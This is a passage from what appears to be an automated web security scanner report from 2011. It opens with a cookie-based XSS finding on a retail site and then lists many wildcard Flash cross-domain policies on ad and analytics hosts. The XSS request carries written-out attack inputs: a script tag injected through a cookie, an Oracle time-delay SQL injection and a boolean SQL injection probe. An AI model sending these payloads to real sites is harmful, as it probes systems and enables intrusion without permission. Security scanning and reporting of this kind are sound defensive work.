Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?itemType=CATEGORY&itemID=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)&path=1%2C2%2C195%2C241 HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e; cmTPSet=Y; PS_ALL=%23ps_catid%7E-1+or+17-7%253d10; s_cc=true; s_sq=%5B%5BB%5D%5Da3d4d--><script>alert(1)</script>26f91f30e7b; 90232094_clogin=l=1301080516&v=3&e=1301082325244

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:20:34 GMT
Server: Apache
ETag: "AAAAS7uc2DA"
Last-Modified: Fri, 25 Mar 2011 19:17:42 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 39295


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
cchr%28100%29%257c%257cchr%28105%29%257c%257cchr%28108%29%257c%257cchr%28101%29%257c%257cchr%28109%29%257c%257cchr%28109%29%257c%257cchr%2897%29%29%252c25%29+from+dual%29; s_cc=true; s_sq=%5B%5BB%5D%5Da3d4d--><script>alert(1)</script>26f91f30e7b; 90232094_clogin=l=1301080516&v=3&e=1301082340667; cmRS=t3=1301080538915&pi=ERROR
UNIQUE_ID: fPNiUqwSrRQAAG3Tu24AAAAE
SCRIPT_URL: /jump.jsp
SCRIPT_URI: https://www.territoryahead.com/jump.
...[SNIP]...

6. Flash cross-domain policy  previous  next
There are 32 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


6.1. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Fri, 25 Mar 2011 19:13:16 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.2. http://aka-cdn-ns.adtechus.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://aka-cdn-ns.adtechus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: aka-cdn-ns.adtechus.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 12 May 2010 09:39:46 GMT
Accept-Ranges: bytes
Content-Length: 111
Content-Type: text/xml
Cache-Control: max-age=141515
Expires: Mon, 28 Mar 2011 11:54:31 GMT
Date: Sat, 26 Mar 2011 20:35:56 GMT
Connection: close

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

6.3. http://api.search.live.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.search.live.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.search.live.net

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Content-Length: 266
Content-Type: text/xml
Last-Modified: Tue, 09 Feb 2010 19:32:41 GMT
ETag: 68D294F3971D1719A2D5F7CCEEAC18F80000010A
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Sat, 26 Mar 2011 20:36:07 GMT
Connection: close
Set-Cookie: _MD=alg=m2&C=2011-03-26T20%3a36%3a07; expires=Tue, 05-Apr-2011 20:36:07 GMT; domain=.live.net; path=/
Set-Cookie: _SS=SID=2DB9D01009D44A2088F8BF513528D138; domain=.live.net; path=/
Set-Cookie: SRCHUID=V=2&GUID=F87E1B9F1DEB4B42A164763906F31065; expires=Mon, 25-Mar-2013 20:36:07 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110326; expires=Mon, 25-Mar-2013 20:36:07 GMT; domain=.live.net; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.4. http://at.atwola.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: at.atwola.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

6.5. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Sat, 26 Mar 2011 19:13:28 GMT
Date: Fri, 25 Mar 2011 19:13:28 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.6. http://dominionenterprises.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dominionenterprises.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dominionenterprises.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:13:29 GMT
Server: Omniture DC/2.0.0
xserver: www93
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.7. http://imagec17.247realmedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imagec17.247realmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: imagec17.247realmedia.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Fri, 30 Oct 2009 20:24:23 GMT
ETag: "100e7-d0-4772cd0408bc0"
Accept-Ranges: bytes
Content-Length: 208
Content-Type: text/xml
Date: Fri, 25 Mar 2011 19:13:23 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

6.8. http://learn.shavlik.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: learn.shavlik.com

Response

HTTP/1.1 200 OK
Content-Length: 145
Content-Type: text/xml
Content-Location: http://learn.shavlik.com/crossdomain.xml
Last-Modified: Sun, 23 Aug 2009 19:48:53 GMT
Accept-Ranges: bytes
ETag: "4e3f9ebe2a24ca1:1772"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 25 Mar 2011 20:41:54 GMT
Connection: close

<?xml version="1.0"?>
<!-- http://www.foo.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.9. http://log30.doubleverify.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://log30.doubleverify.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: log30.doubleverify.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sun, 17 Jan 2010 09:19:04 GMT
Accept-Ranges: bytes
ETag: "034d21c5697ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 20:36:37 GMT
Connection: close
Content-Length: 378

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.10. http://o.sa.aol.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://o.sa.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: o.sa.aol.com

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:35:54 GMT
Server: Omniture DC/2.0.0
xserver: www18
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.11. http://oasc05139.247realmedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: oasc05139.247realmedia.com

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:13:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Fri, 10 Jul 2009 20:04:47 GMT
ETag: "11e009-d0-46e5f7bee35c0"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

6.12. http://pixel.quantserve.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Sun, 27 Mar 2011 20:36:18 GMT
Content-Type: text/xml
Content-Length: 207
Date: Sat, 26 Mar 2011 20:36:18 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.13. http://s0.2mdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Fri, 25 Mar 2011 11:46:38 GMT
Expires: Thu, 24 Mar 2011 11:46:37 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 26799
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.14. http://secure-us.imrworldwide.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:18 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Sat, 02 Apr 2011 20:36:18 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

6.15. http://segment-pixel.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 26 Mar 2011 20:36:22 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

6.16. http://wsjrs2.s3.amazonaws.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wsjrs2.s3.amazonaws.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: wsjrs2.s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/490793/1-wsj_110047_liberal_300x250_concept2_v7.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: /ygg2oiBHlK6v15qwV3Mlh9lLjFKvnbFUZOKSUEaSxZznqachH6OCbBqhJFiloe2
x-amz-request-id: 76651971862BC367
Date: Sat, 26 Mar 2011 20:36:25 GMT
Last-Modified: Tue, 30 Mar 2010 18:47:15 GMT
ETag: "0bac47246d36616ecd0dddf332b7b352"
Accept-Ranges: bytes
Content-Type: application/xml
Content-Length: 213
Server: AmazonS3

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><allow-access-from domain="*"/></cross-do
...[SNIP]...

6.17. http://www.econda-monitor.de/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.econda-monitor.de
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.econda-monitor.de

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"214-1265030770000"
Last-Modified: Mon, 01 Feb 2010 13:26:10 GMT
Content-Type: application/xml
Content-Length: 214
Date: Fri, 25 Mar 2011 20:43:40 GMT
Connection: keep-alive

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-d
...[SNIP]...

6.18. http://www.huffingtonpost.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.huffingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.8 (Unix)
Last-Modified: Thu, 01 Jul 2010 13:55:20 GMT
ETag: "26e2850-fd-48a53d22e2200"
Content-Type: application/xml
Date: Sat, 26 Mar 2011 20:36:01 GMT
Content-Length: 253
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><allow-access-from domain="*" /><allow-http-request-headers
...[SNIP]...

6.19. http://ads.tw.adsonar.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.tw.adsonar.com

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:16 GMT
Server: Apache
Last-Modified: Tue, 07 Apr 2009 17:58:21 GMT
ETag: "a3d-466fac2afc940"
Accept-Ranges: bytes
Content-Length: 2621
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300, max=980
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="assets.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.quigo.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lonelyplanet.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mochila.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.conxise.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="app.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.digitalcity.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn-startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channels.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channel.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.web.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.my.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.news.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="iamalpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="imakealpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " secure="false" />
...[SNIP]...
<allow-access-from domain="*.spinner.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.popeater.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.theboombox.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.opticalcortex.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yourminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.liveminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.lightningcast.com" to-ports="*" secure="false" />
...[SNIP]...

6.20. http://api.tweetmeme.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.tweetmeme.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.tweetmeme.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 26 Mar 2011 16:58:17 GMT
Content-Type: text/xml; charset='utf-8'
Connection: close
P3P: CP="CAO PSA"
Expires: Sat, 26 Mar 2011 16:58:53 +0000 GMT
Etag: fe9f3be2d9532deeab27f58209bf7be5
X-Served-By: h03

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.break.com" secure="true"/><allow-access-from domain="*.nextpt.com" secure="true"/>
...[SNIP]...

6.21. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Fri, 25 Mar 2011 11:46:53 GMT
Expires: Sat, 26 Mar 2011 11:46:53 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 26498
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

